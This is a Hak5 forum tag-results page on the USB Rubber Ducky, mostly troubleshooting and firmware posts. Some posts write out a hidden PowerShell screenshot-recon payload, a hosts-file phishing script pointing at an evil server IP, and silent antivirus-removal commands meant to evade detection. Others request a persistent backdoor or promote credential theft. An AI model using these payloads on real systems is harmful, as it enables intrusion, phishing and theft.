Jump to content

Search the Community

Showing results for tags 'DUCKY'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Whats the difference between basic ducky and the deluxe version?
  2. So, today, with a new problem. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result.
  3. So, today, with a new problem. EDIT: This is what KKP ( A keylogger ) logged when I hit the button to start the script ** [Ctrl][Alt][AltGr][up][End][Ctrl][Windows][Ctrl][AltGr][End][Alt][AltGr]#[Ctrl][AltGr][Alt][Ctrl][AltGr][Ctrl][AltGr][Ctrl][Windows][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows][AltGr][Alt][AltGr][PageUp][Windows]J[Ctrl][Windows][AltGr][Alt][AltGr][PageDown][Ctrl][Alt][Ctrl][AltGr] [NumLock][Ctrl][Alt][Windows][Alt][AltGr][Alt][Windows][AltGr][MenuClick][Ctrl][Windows][Ctrl][AltGr][PageUp][Alt][Ctrl][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][scrollLock][Ctrl][Alt][Windows][AltGr][Ctrl][Alt][AltGr][Ctrl][AltGr][Alt][Windows]>[Windows][Ctrl][AltGr][MenuClick][Ctrl][Alt][Windows][MenuClick][Ctrl][Alt][AltGr][Alt][Ctrl][AltGr][PageDown][Ctrl][AltGr][F12][Windows]J[Ctrl][Alt][AltGr][F11][Ctrl][AltGr][Delete][End][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][/scrollLock][Ctrl][Alt][AltGr][Cancel][Alt][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Alt][Windows][AltGr][Ctrl]>[Ctrl][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Ctrl][Ctrl][AltGr][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows] ** That's all that was logged. HELP! can I get a email address to hak5? Last time they just sent me here. Is there a way to contact Darren himself? It's sad when a company just sends you to a useless forum without even helping. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result. ALSO:; The microSD card wont save any new data?
  4. So, I just recently got my ducky, and when I downloaded and ran a few commands I decided to make my own. After trying it, it didn't work, so I went to go and run one I had already ran ( That did work ) and now when I plug my ducky in, all it does it flash green with almost no break in-between. Help! Can someone give me a full explanation on how to use this? And how to fix it.. Thanks
  5. [Help] I need a backdoor dropper for the ducky, or help on making one. What it needs to do: Work on windows (victim) Work over the internet Be sort-of fast (like, not typing out stuff forever) Persistent (Across reboots) I can use LINUX, BACKTRACK, WINDOWS, or any other linux distro, like KALI. I can also upload an exe to mediafire for wget and execute (I don't need help with that). I just need help making the file and or ducky script. -Thanks in advance.
  6. At the end of 2012, our aim was to implement the Hacker Zodiac with 2013 starting with the year of the Duck! The USB Rubber Ducky (aka Ducky) has seen some important advancements due to the tremendous support from the Hak5 community. A brief summary: The Ducky now supports BOOT MODE and should work if the BIOS supports USB Keyboards Anti-Virus / Device Management Evasion Additional language key-mapping support (still ongoing...) Improved Ducky Encoder Additional and Fun Payloads spanning various Operating Systems: WinXX, Linux, OSX, BSD, Solaris Lots of bug fixing Lots of source code released Additional Frameworks eg. Simple-Duck-Payload-Generator, DuckToolkit :D Most importantly - a BIGGER community. Just wanted to send my thanks out to the community for such a great year; for all your feedback, and help generating new language key-maps - without you this would not be possible? Wishing you a Happy 2014 and keep on Ducking!!! PS: For all those new Duck owners you might be interested in https://forums.hak5.org/index.php?/topic/28627-info-how-i-wrote-the-community-edition-firmware/ , I am hoping this will inspire you to pick up the code, and further the development of this cool device - you never know I might have missed something, and you'll generate even cooler firmwares compared to the code I've already developed. (Think 2014 might be year of the Pineapple ;) )
  7. Hi, I've downloaded the source for the c_duck firmware, and I changed a few of the properties so the duck has a different name - at least most of it anyway, but when I compile it and then flash it; the duck registers as a Mass Storage Device, but the duck won't emulate the keyboard, and the USB Mass Storage has the name "ATMEL Ducky Storage USB Device". I've changed all the strings in the "config_usb.h" so the name is different but it still doesn't work. All I've changed is: Still no luck. Also, when I compile the program, I get errors related to "input", the errors I get are: "input is not relaxable" and "no return statement in function returning non-void". I want to edit the "Composite_Duck_4cap" firmware but I can't find the source, so I'm using the "Composite Duck" firmware to see if I can successfully modify the code. Is it possible for you to upload a custom version of the "Composite Duck" firmware so that the Duck doesn't register as a Duck? Such as what I was trying to acomplish in the Quote above... Thanks. And thank you for all your work so far! You really do take care of the Ducky project :)
  8. I had some problem when I receive my Rubber Ducky. All keyboard properties won't fit my keyboard and many others so I take a day to do this, a canadian french keyboard.properties. I hope it will be usefull. Just not reconize 1 key, so you cannot use these 3 characters : « ° » I don't think it very important, but if someone want to upgrade it or revise it to make this characters work, as you want. To add this properties to your Ducky, download and extract to the same folder as encoder.jar. To encode your ducky you need the next line: java -jar encoder.jar -i yourfile.txt -o inject.bin -l ca.properties The ca.properties must be in the same folder as encoder.jar or change "-l ca.properties" for this "-l path\to\folder\ca.properties D4rk F1r3 ca.rar
  9. I had my Rubber Ducky for a while now. I understand that the supplied microSD card is FAT formatted but over time of formatting it (to FAT) I can't read or write from it. Windows tells me to format it but fails to. I tried every formatting method and can't find a solution. As of now I believe it's dead. I have a 8gb microsd(HC) but can't format it to FAT only FAT32. Can someone point me in the direction to a link to buy a FAT microSD card or help me out. Any reply is acceptable.
  10. How can I trigger the OPTION key on OSX? I am trying to use keyboard shortcuts to open finder, search for terminal, and then open it. I want to minimize all windows using COMMAND-OPTION-M and then launch finder with COMMAND-F
  11. Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWSOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)? I THINK PAYLOADS SHOULD DO MORE! So... I introduce the ULTIMATE DATA THEIF!!! Payload: Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead. Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB READ ME!!.txt contents: SCRIPT/PAYLOAD BY LAVANOID VOLCANIC THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULD BE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. FILE LOCATIONS: SP.bat -- Data\SP.bat inject.txt -- Scripts\Projects\Steal_Data\inject.txt Compiler.bat -- Scripts\Compiler.bat COMPILER.bat description: The compiler batch file basically takes away the hassle of entering all those annoying time draining commands. If the Compiler.bat file is stored on the Duck, the compiler will ask if you want to install it on the Duck. WHAT I HOPE: I hope that my project will be featured in one of the Hak5 videos since I do like some attention. THIS WORLD IS LONELY YOU KNOW!! Thank you for choosing to spend a bit of your time by poking your nose into my work.
  12. Hi all Trying to use my brand new (first time user) USB Ruber Ducky and can't get it to work. This is the script I'm trying: DELAY 15000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 ENTER LEFTARROW ENTER Everyting runs smooth until my LEFTARROW, I've tried to use ALT Y insted (and ALT J for swedish windows) Nothing works, the Yes button doesn't get selected and the script stops right there :-( What noob mistake have i done? It's a windows7, swedish keyboard, english version of windows
  13. I found the following little tid bit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK. VirusScan Enterprise 8.8 msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.7i msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.5i msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.0i msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q Switches that you can use with msiexec.exe: /q The quiet switch ensures the removal is done silently - nothing is displayed. /x This switch will automatically remove an installation. /i This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation. /? This switch provides additional information on all msiexec.exe command switches.
  14. Hello all, This is just a small bit of logic to pull the architecture type from the machine and based on that, perform different functionality calls IE: for Mimikatz using both the 32 / 64 bit versions or with procdump specifying -64 for 64 bit machines or not... etc. STRING wmic computersystem get SystemType | find "x64" >nul&& (set "SystemType=64bit") || (set "SystemType=32bit") Anyhow, you'd put in logic after this which would run your different executable based on the %SystemType% var I'll write up a full demo script in a bit for those of you wanting an example. Thank you. Enjoy!
  15. Hey guys, Do I replace the Green statements with the evil server IP and web address with or without the brackets and quotes? Secondly can someone decipher what this means "you need to add the www. version and with out it as well." in the 5th REM line? Thanks in advance guys https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---ducky-phisher REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER
  16. Hey guys! So for some reason our old #ducky channel on the IRC died, but now it's alive again! So there is now a place to discuss the Duck in IRC, too. The channel is on the official Hak5 IRC (Secfo), at either irc.hak5.org #ducky or irc.secfo.org #ducky on ports 6669 or 7000 for SSL! Come and join in :D -Foxtrot
  17. Hey, looking at the examples on github and on the forums, I see a lot of fun payloads for windows, but almost none for mac and 0 linux. Are there any cool Linux/Mac payloads out there that I should check out?
  18. iOS keyboard exploit allows brute force iPad lock screen attack If someone with an iPad can test this out? (I dont own one) Previous attempts at using a usb adapter meant we could type into Notes. Be interesting if this can be achieved with the new HID firmware compiled with BOOT mode (thats duck_v2.1.hex). Thanks ~Snake
  19. I want to buy the Ducky but I need it to have more storage and to hold data. The payload I want to make is for the usb to back up files on the computer once plugged in. I read that the storage can be increased but the ability for Ducky to be used as a normal usb is not clear. Any help would be great, thanks!
  20. ducky-flasher I was finding the process of flashing the ducky kind of a pain (and I wanted it faster XD), so I wrote a small program in python to do the work for me. I thought I share it :) https://code.google.com/p/ducky-flasher/ It can flash the following firmware: duck.hex v2 (Duck(Original)) usb.hex v2 (FAT Duck) m_duck.hex v2 (Detour Duck(formerly Naked Duck)) c_duck.hex v2 (Twin Duck) (Special 1) (Special 2) Installation 1. Install dfu-programmer (apt-get install dfu-programmer) 2. Download ducky-flasher 2. unzip ducky-flasher1.0 3. cd ducky-flasher1.0 4. sudo python setup.py 5. sudo ducky-flasher Usage To start simply type ducky-flasher in a terminal emulator Insert your ducky while holding down the GPIO pin to put it in DFU mode Uninstalling 1. sudo python uninstall.py https://code.google.com/p/ducky-flasher/
  21. I have been all over this forum, the github and google code page, but i cannot find the script to flash new firmware to the ducky using linux. i did find a couple things that mentioned how to do it as well as dependencies needed and the mention of duckyflash.sh, but it seems that this file is no longer exsists anywhere for download. So does anyone have any idea where to get it or how to get this done. Also when is the usbrubberducky website going to be back up and running.
  22. I need Help I did your basic encoding and The rubberducky will not translate or the script is flawed when encoded. C:\AllDownloads\Rubber Ducky\Encoder\3.0.0>java -jar encoder.jar --debug -i source.txt -={ HAK5 :: TRUST YOUR MOTHERDUCKING TECHNOLUST }=- USB Rubber Ducky Encoder v3.0.0 Script: source.txt Loading DuckScript ..... [ OK ] Spawning Ducklings ..... [ OK ] Generating Keyboard Settings ..... [ OK ] Localising Keyboard Settings ..... [ OK ] Preprocessing Script ..... [ OK ] Encoding Script ..... [ OK ] Writing Binary File ..... [ OK ] Encoding Complete! C:\AllDownloads\Rubber Ducky\Encoder\3.0.0> Windows comes up with a cmd error "Windows cannot find 'Pad.exe" I have tried it several times and the word Notepad gets trunkcated in different positions tried different sleeps up to 5000 and still no go. I used your simple text input to no avail. GUI r SLEEP 2000 STRING notepad.exe ENTER SLEEP 2000 STRING Hello World! Your debug did not give me any extra info than I am showing here either. I am almost ready to send this duck back I had just bought it as a joke to play with and I seem to be the one getting joked on. If you can help thanks. It seems I can not upload the source.txe or the inject.bin file even if I put txt on the end. When the duck goes to open start and the cmd enter box it always distorts the text Notebook.exe and leaves out letters so it cannot execute.
  23. Good Morning, Afternoon or Evening, About 2-3 weeks ago I received my Ducky. I unpacked everything. I took the following steps / got the following results: 1) Formatted the stock 256MB MicroSD card as FAT. 2) Inserted with no code in Duck. 3) Solid red LED comes on immediately. 4) Removed MicroSD, put in carrier, copied "Hello World!" to card. Reinserted in Duck, 5) Still solid red LED. 6) Tried every other available format - FAT32, exFAT(?), NTFS, no go. 7) Tried a name brand (Sans Disk) 8GB MicroSD. 8) Repeated steps 1-4, same result. I get the red LED with or without a card inserted, formatted in any format, with or without the stock "Hello World" script. I contacted Hak5 shop, they replied with what seemed to be "sympathetic boilerplate" - extending regrets for my issues but advising me they don't do tech support and referred me to this forum. Soooo, here I am! B) Does anyone have any ideas, suggestions, etc.? Or should I call it quits and return the Duck to Hak5 for replacement? :( Cheers, --P P.S.: I should probably add: I'm running Windows 7 Ultimate 64 bit, if that matters (I suspect it doesn't really, but if I knew what the prolem & fix were, you wouldn't be reading this! ;-P )
  24. hey gang! Ok so I'm trying to automate a script for my mother so I can get her work laptop MAC filtered into her home network. She so conveniently keeps forgetting it at work. Bring in the Duck!! Here's my goal: I want to create a payload to where it opens up cmd, does "ipconfig /all", saves what the terminal session spits out to a .txt in the c:\ drive, then copy that newly created .txt to the duck. Here's what I got, that doesn't work: delay 800 gui x (I'm testing this on my windows 8 machine, she still runs XP SP3) up up enter string CMD string ipconfig /all >c:\ipdata.txt ; copy /A ipdata.txt f:\ /A /V delay 300 When I test this on my win8 box, it does open cmd, but after it does a bunch of other crazy things. However if I take the code down to just: delay 800 gui x up up enter string cmd I get the cmd window normally. any ideas?
  25. The Naked Duck has been upgraded to version 2 firmware. This means: VID & PID Controlled through vidpid.bin (on sdcard root).Upgrades: Multi-payloads now trigger on Keypress (added interrupt B) ) No longer have to press the GPIO button Meaning the Ducky can put on his Black Dinner Suit like a real spy (or the USB case in reality); Probably means he needs a new codename. Warning: the use of CAPS_LOCK/NUM_LOCK/SCROLL_LOCK in Ducky scripts may cause scripts to collide! And if you didn't spot it: Inject.bin = default payload on boot Inject2.bin = Num_Lock Inject3.bin = Caps_Lock Inject4.bin = Scroll_Lock <- New Trigger Key Usually procedure, provide feedback here. My laptop doesn't haves scroll_lock so its untested - the other keys work fine. Download in usual place: http://code.google.com/p/ducky-decode/downloads/list ~~Snake PS. Kind breaks rule 6 of Duck Club, for those unfamiliar with Duck Club see post http://forums.hak5.org/index.php?/topic/28323-happy-ducky-xmasnew-year/
×
×
  • Create New...